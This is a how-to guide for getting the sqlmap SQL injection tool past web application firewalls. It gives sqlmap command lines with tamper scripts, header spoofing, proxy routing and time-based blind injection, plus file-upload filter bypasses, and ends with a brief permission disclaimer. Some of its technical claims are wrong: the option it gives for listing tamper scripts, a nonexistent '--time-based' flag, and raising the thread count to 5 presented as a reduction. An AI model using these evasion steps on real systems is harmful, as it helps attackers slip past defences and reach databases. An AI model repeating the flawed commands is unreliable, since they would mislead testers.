SQLMAP WAF Bypass Guide

TL;DR

Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) often block SQLmap’s default requests. This guide shows techniques to bypass these protections, allowing you to successfully identify and exploit SQL vulnerabilities.

1. Understand the Block

Before attempting a bypass, understand *why* SQLmap is being blocked. Common reasons include:

• Signature-based detection: The WAF recognises common SQL injection patterns in your requests.
• Rate limiting: Too many requests from your IP address trigger the block.
• HTTP protocol anomalies: Unusual headers or request structures are flagged.

Check server responses (error messages, HTTP status codes) and WAF logs if available.

2. Tamper Scripts

SQLmap’s tamper scripts modify requests to evade detection. They alter the payload without changing its meaning for the database.

1. List Available Tamper Scripts: Use sqlmap -T all to see a full list of available scripts.
2. Apply a Script: Use the --tamper option followed by the script name. For example, to use the ‘space2comment’ script:

   sqlmap -u "http://example.com/vuln?id=1" --tamper space2comment

3. Combine Scripts: Use multiple tamper scripts for stronger obfuscation:

   sqlmap -u "http://example.com/vuln?id=1" --tamper space2comment,apostrophemask

4. Commonly Useful Tamper Scripts:
   • space2comment: Replaces spaces with comments (/**/).
   • apostrophemask: Masks single quotes.
   • base64encode: Encodes the payload in base64.
   • hexencode: Encodes the payload in hexadecimal.
   • randomcase: Randomly changes the case of letters.

3. HTTP Request Options

Modify how SQLmap sends requests to avoid detection.

1. –cookie: Use a valid cookie for authentication and session persistence, which can sometimes bypass checks.

   sqlmap -u "http://example.com/vuln?id=1" --cookie="sessionid=abcdefg"

2. –user-agent: Change the User-Agent string to mimic a legitimate browser:

   sqlmap -u "http://example.com/vuln?id=1" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

3. –referer: Set a Referer header to appear as if the request came from another page on the site:

   sqlmap -u "http://example.com/vuln?id=1" --referer="http://example.com/home"

4. –headers: Add custom HTTP headers.

   sqlmap -u "http://example.com/vuln?id=1" --headers="X-Custom-Header: value"

5. –proxy: Route traffic through a proxy server to hide your IP address and potentially bypass rate limiting:

   sqlmap -u "http://example.com/vuln?id=1" --proxy="http://your-proxy-ip:port"

6. –threads: Reduce the number of threads to avoid overwhelming the server and triggering rate limiting:

   sqlmap -u "http://example.com/vuln?id=1" --threads=5

4. Time-Based Blind SQL Injection

If other techniques fail, try time-based blind SQL injection. This is slower but often bypasses WAFs because it doesn’t use typical SQL injection keywords.

1. Use the --time-based option:

   sqlmap -u "http://example.com/vuln?id=1" --time-based --level=5 --risk=3

2. Adjust Level and Risk: Increase --level (1-5) for more thorough testing, but be aware of increased server load. Adjust --risk (1-3) to control the aggressiveness of the tests.

5. File Upload Bypass

If the vulnerability involves file uploads, WAFs may block specific file extensions or content types. Try these bypasses:

• Change File Extension: Use less common extensions (e.g., .php3, .phtml).
• Double Encoding: Encode the filename multiple times.
• Content-Type Manipulation: Modify the Content-Type header to bypass checks.

6. Cyber security Considerations

Always obtain explicit permission before performing any penetration testing or vulnerability scanning on a system you do not own. Unauthorized access is illegal and unethical.